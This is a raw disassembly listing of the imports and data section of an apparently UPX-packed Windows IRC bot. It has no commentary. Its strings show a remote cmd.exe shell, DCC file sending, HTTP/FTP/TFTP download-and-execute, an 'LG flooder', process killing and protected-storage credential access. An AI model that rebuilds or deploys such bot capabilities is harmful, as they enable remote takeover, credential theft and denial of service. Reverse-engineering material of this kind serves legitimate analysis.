dword_417008 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_406722+184�r ...
dword_41700C dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4083AD+2DD�r ...
dword_417010 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_417014 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_417018 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameAdword_41701C dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_417020 dd 77DE5244h ; resolved to->ADVAPI32.CryptGenRandom ; sub_4102AE+37�r ...
dword_417024 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_417028 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_406722+2F9�r ...
align 10h
dword_417030 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40D043+20B�r ...
dword_417034 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_408342+4B�r
dword_417038 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryAdword_41703C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_414EF4+8EE�r
dword_417040 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_417044 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_406B81+95�r ...
dword_417048 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_41704C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_417050 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_406AE7+15�r ...
dword_417054 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_403BD3+32�r ...
dword_417058 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_403BD3+4D�r ...
dword_41705C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_407148+18B�r ...
dword_417060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_406E8E+1FE�r
dword_417064 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_409CB1+CF�r ...
dword_417068 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_406D90+D3�r
dword_41706C dd 7C8217EAh ; resolved to->KERNEL32.SearchPathAdword_417070 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_401981+D7�r
dword_417074 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_401981+111�r
dword_417078 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_41707C dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_406E8E+2A5�r
dword_417080 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_417084 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_417088 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_41708C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40332B+1D0�r ...
dword_417090 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40332B+1D7�r ...
dword_417094 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_406041+193�r ...
dword_417098 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_406509+91�r
dword_41709C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401244+4F4�r ...
dword_4170A0 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_406643+3B�r
dword_4170A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401244+4C1�r ...
dword_4170A8 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_406E8E+22A�r ...
dword_4170AC dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401E38+30�r ...
dword_4170B0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4170B4 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_4170B8 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4170BC dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4170C0 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4170C4 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4170C8 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_408F2E+134�r
dword_4170CC dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_408F2E+7F�r ...
dword_4170D0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4092A4+14�r ...
dword_4170D8 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4092A4+A�r ...
dword_4170DC dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_4170E0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_4098F3+1B6�r
dword_4170E4 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_4170E8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_406643+19�r
dword_4170EC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4170F0 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4170F4 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_4170F8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4170FC dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_414EF4+5BC�r ...
dword_417100 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_417104 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_417108 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_414EF4+5CE�r ...
dword_41710C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection dd 0
dword_417114 dd 77C1C1F3h ; resolved to->MSVCRT._itoadword_417118 dd 77C464BFh ; resolved to->MSVCRT._strnicmpdword_41711C dd 77C226F6h ; resolved to->MSVCRT._CxxThrowExceptiondword_417120 dd 77C21868h dword_417124 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_417128 dd 77C472B0h ; resolved to->MSVCRT.memmovedword_41712C dd 77C46030h ; resolved to->MSVCRT.strcpydword_417130 dd 77C35E02h ; resolved to->MSVCRT._rotrdword_417134 dd 77C35DDEh ; resolved to->MSVCRT._rotldword_417138 dd 77C3FF8Ah ; resolved to->MSVCRT._vsnprintfdword_41713C dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_417140 dd 77C1C9C9h ; resolved to->MSVCRT.tolowerdword_417144 dd 77C47730h ; resolved to->MSVCRT.strcmpdword_417148 dd 77C4186Ah ; resolved to->MSVCRT.printfdword_41714C dd 77C29CC5h dword_417150 dd 77C29CDDh dword_417154 dd 77C3FE49h ; resolved to->MSVCRT.vsprintfdword_417158 dd 77C3A3DBh ; resolved to->MSVCRT._beginthreadexdword_41715C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_417160 dd 77C50290h ; resolved to->MSVCRT.ceildword_417164 dd 77C4FA10h ; resolved to->MSVCRT._ftoldword_417168 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_41716C dd 77C2C437h ; resolved to->MSVCRT.reallocdword_417170 dd 77C47A50h ; resolved to->MSVCRT.strncmpdword_417174 dd 77C3FA76h ; resolved to->MSVCRT._snprintfdword_417178 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_41717C dd 77C41B72h ; resolved to->MSVCRT.sscanfdword_417180 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_417184 dd 77C4139Ch ; resolved to->MSVCRT.fseekdword_417188 dd 77C411FBh ; resolved to->MSVCRT.freaddword_41718C dd 77C3F010h ; resolved to->MSVCRT.fopendword_417190 dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_417194 dd 77C4173Bh ; resolved to->MSVCRT.fwritedword_417198 dd 77C41574h ; resolved to->MSVCRT.ftelldword_41719C dd 77C46040h ; resolved to->MSVCRT.strcatdword_4171A0 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_4171A4 dd 77C4A969h ; resolved to->MSVCRT.clockdword_4171A8 dd 77C3F931h ; resolved to->MSVCRT.sprintfdword_4171AC dd 77C47A90h ; resolved to->MSVCRT.strncpydword_4171B0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_4171B4 dd 77C2C21Bh ; resolved to->MSVCRT.freedword_4171B8 dd 77C2C407h ; resolved to->MSVCRT.mallocdword_4171BC dd 77C478A0h ; resolved to->MSVCRT.strlendword_4171C0 dd 77C4624Eh ; resolved to->MSVCRT._stricmp align 8
dword_4171C8 dd 7712A63Fh align 10h
dword_4171D0 dd 7CA41110h ; resolved to->SHELL32.ShellExecuteA ; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_4171DC dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericAdword_4171E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_408F2E+1D1�r ...
dword_4171E4 dd 7E43212Bh ; resolved to->USER32.GetWindowTextA ; sub_415B60+84�r
dword_4171E8 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_4171EC dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_4050EA+106�r ...
dword_4171F8 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4171FC dd 71AC1028h ; resolved to->WS2_32.accept ; sub_4048EF+39F�r
dword_417200 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_412A3A+178�r ...
dword_417204 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4055E5+7B�r ...
dword_417208 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_411DC5+DF�r ...
dword_41720C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40A9CF+1A74�r
dword_417210 dd 71AC0B50h ; resolved to->WS2_32.getpeername ; sub_4045B2+21�r
dword_417214 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_40447B+10�r
dword_417218 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4046BC+CE�r ...
dword_41721C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_40732D+1A8�r ...
dword_417220 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4038BA+171�r ...
dword_417224 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_4038BA+186�r ...
dword_417228 dd 71ABE59Dh ; resolved to->WS2_32.getservbyportdword_41722C dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_404E1C+E0�r ...
dword_417230 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB2A5Eh ; resolved to->WS2_32.WSASetLastError ; sub_403588+4A�r ...
dword_417238 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_403588+1FE�r ...
dword_41723C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4055E5+F3�r ...
dword_417240 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_40449C+21�r ...
dword_417244 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4055E5+DD�r ...
dword_417248 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_4053DC+27�r ...
dword_41724C dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_4020C2+201�r
dword_417250 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_411DC5+372�r ...
dword_417254 dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_407148+183�r ...
dword_417258 dd 71AB2D0Fh ; resolved to->WS2_32.recvfromdword_41725C dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_417260 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_417264 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_417268 dd 71AB88D3h ; resolved to->WS2_32.listen align 10h
flt_417270 dd 1.0e3 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 1.024e3 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 dd offset loc_416AC5
dd offset loc_416ADB
dd offset dword_4172F0
off_4172B4 dd offset sub_416F05 ; DATA XREF: sub_416ED3+12�o
; UPX0:00416F3A�o ...
dd offset dword_417338
off_4172BC dd offset sub_416F86 ; DATA XREF: UPX1:off_41DEB0�o
; UPX1:off_41DED0�o
off_4172C0 dd offset off_41DEB0 ; DATA XREF: UPX1:004172D8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172C0
dword_4172DC dd 3 dup(0) dd 1, 4172D8h
dword_4172F0 dd 3 dup(0) dd offset off_41DEB0
dd offset dword_4172DC+4
align 8
off_417308 dd offset off_41DED0 ; DATA XREF: UPX1:00417320�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
dd 0
db 0 ; DATA XREF: UPX1:00417348�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 417320h
dword_417338 dd 3 dup(0) dd offset off_41DED0
dd offset unk_417328
align 10h
dword_417350 dd 19930520h, 4, 417370h, 5 dup(0) dd 0FFFFFFFFh, 416FB0h, 0
dd offset loc_416FBC
dd 1, 416FC5h, 2, 416FD1h, 0
dd offset off_41DEB0
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h dword_4173B8 dd 0 dd offset sub_416F4E
dd 0
dd offset dword_4173B0
dd 30Eh dup(0)
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset aKnJnuXxQEzds ; "ߕ帚ɟ"
dd offset dword_418014
dd 0
dword_418014 dd 0BC8A9BAAh, 8B88998Dh, 93C484B7h, 0C9AAA3F9h, 87ABB697h
; DATA XREF: UPX1:0041800C�o
dd 0BCB187A4h, 98D9B59Eh, 0CA86A5E3h, 89AA8EA5h, 2 dup(0)
aKnJnuXxQEzds db 'ߕ帚ɟ',0 ; DATA XREF: UPX1:00418008�o
align 4
dd 0
dword_41805C dd 9CBFADAAh, 0ADA6B5BFh, 95DFBB9Eh, 0C99AB8E5h, 0BF85B69Fh
; DATA XREF: UPX1:00418004�o
dd 0A7B0BAA1h, 0B5EA85B5h, 0C39BA5E2h, 8D8FB697h, 0A7BDA7BAh
dd 83E4AAACh, 0D48C84F9h, 8DBAAB8Fh, 0BBh, 0
dword_418098 dd 9CBFADAAh, 0ADA6B5BFh, 95DFBB9Eh, 0C99AB8E5h, 0BF85B69Fh
; DATA XREF: UPX1:off_418000�o
dd 0A7B0BAA1h, 0B5EA85B5h, 0C39BA5E2h, 8D8FB697h, 0A7BDA7BAh
dd 83E4AAACh, 0F9h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69hdword_4184C0 dd 7075202Ch, 69746164h, 676Ehunk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ahdword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775haModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h dword_418A1C dd 0C6AEB58Eh, 0A6BBB6FEh, 93D8D8A7h, 0E3h, 0dword_418A30 dd 2E3031h dword_418A34 dd 2E323931h, 2E383631h, 0dword_418A40 dd 2E323731h, 0 dword_418A48 dd 2E373231h, 0 dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; sub_41113B+45A�o
dword_418A5C dd 313A3Ah dword_418A60 dd 7525h ; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; UPX1:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365hdword_418B54 dd 58323025h, 0 ; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
